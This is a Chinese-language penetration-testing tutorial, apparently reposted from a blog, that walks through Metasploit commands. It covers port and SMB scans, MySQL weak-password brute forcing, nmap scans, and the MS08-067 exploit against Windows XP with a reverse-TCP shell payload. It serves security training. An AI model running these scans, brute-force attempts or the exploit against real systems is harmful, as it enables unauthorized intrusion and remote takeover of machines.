Msfconsole工具?概括:
Msfconsole簡稱(msf)是一款常用的滲透測試工具,包含了常見的漏洞利用模塊和生成各種木馬,方便于安全測試人員的使用.
目錄:
?????????????????Msfconsole的使用:
? ? ? ? 第一步:進行端口掃描.
? ? ? ? 第二步:進行服務的掃描.
? ? ? ? 第三步:掃描3306(Mysql)端口的弱口令
? ? ? ? 第四步:在msf模塊里也可以使用nmap進行掃描.
? ? ? ? 第五步:掃描了服務器是用Win XP,然后對服務器進行滲透測試.
? ? ? ? ?滲透測試失敗的原因:
免責聲明:
嚴禁利用本文章中所提到的虛擬機和技術(shù)進行非法攻擊,否則后果自負,上傳者不承擔任何責任。
Msfconsole的使用:
打開Msfconsole工具:
msfconsole
第一步:進行端口掃描.
(1)查看端口掃描的模塊:
search portscan
(2)使用端口掃描模塊:
use auxiliary/scanner/portscan/tcp
(3)查看模塊信息(模塊里的yes都要填):
show options
(4)設(shè)置目標IP進行掃描:
set rhosts (目標IP地址)
(5)設(shè)置線程為100:
set threads 100
(6)使用(執(zhí)行):run 或者 exploit
run
(7)退出到msf :
back
第二步:進行服務的掃描.
(1)查看smb_version服務模塊:
search smb_version
(2)使用服務模塊:
use auxiliary/scanner/smb/smb_version
(3)查看模塊信息(模塊里的yes都要填):
show options
(4)設(shè)置目標IP進行掃描:
set rhosts (目標IP地址)
(5)設(shè)置線程為10:
set threads 10
(6)使用(執(zhí)行):run或者exploit
run
(7)退出到msf :
back
第三步:掃描3306(Mysql)端口的弱口令
(1)查看掃描3306(Mysql)端口的弱口令模板信息:
search mysql_login
(2)使用掃描3306(Mysql)端口的弱口令模塊:
use auxiliary/scanner/mysql/mysql_login
(3)查看模塊信息(模塊里的yes都要填):
show options
(4)設(shè)置目標IP進行掃描:
set rhosts (目標IP地址)
(5)設(shè)置線程為10:
set threads 10
(6)使用(執(zhí)行):run或者exploit
run
(7)退出到msf :
back
第四步:在msf模塊里也可以使用nmap進行掃描.
(1)主機發(fā)現(xiàn):
nmap -sn 地址/24
(2)端口掃描:
nmap -sS 地址
(3)系統(tǒng)掃描:
nmap -O 地址
(4)版本掃描:
nmap -sV 地址
(5)綜合掃描:
nmap -A 地址
第五步:掃描了服務器是用Win XP,然后對服務器進行滲透測試.
(1)啟動 postgresql 數(shù)據(jù)庫:
systemctl start postgresql.service
(2)設(shè)置為開機自啟:
systemctl enable postgresql
(3)啟動 Metasploit
msfconsole
(4)搜索Win XP漏洞對應的模塊.
search ms08_067
(5)使用Win XP漏洞掃描模塊.
use exploit/windows/smb/ms08_067_netapi
(6)設(shè)置攻擊載荷
set payload generic/shell_reverse_tcp
(7)查看模塊信息(模塊里的yes都要填).
show options
(8)查看滲透攻擊模塊的攻擊平臺,找到操作系統(tǒng)平臺版本
show targets
(9)設(shè)置操作系統(tǒng)(target).
set target 34
(10)設(shè)置目標IP.
set rhosts (目標IP地址)
(11)設(shè)置本地IP
set LHOST 本地IP
(12)設(shè)置端口:
set LPORT 4444
(13)使用(執(zhí)行):run或者exploit
(14)滲透測試成功.?
滲透測試失敗的原因:
(1)靶機開啟了防火墻.
(2)兩臺主機不能互聯(lián).(用 ping IP地址)
? ? ?文章來源:http://www.zghlxwxcb.cn/news/detail-601667.html
參考鏈接:使用MSF 利用 ms08_067 對 XP 進行滲透_豐梓林的博客-CSDN博客文章來源地址http://www.zghlxwxcb.cn/news/detail-601667.html
到了這里,關(guān)于內(nèi)網(wǎng)安全:Msfconsole攻擊技術(shù)(成功拿下服務器最高權(quán)限.)的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!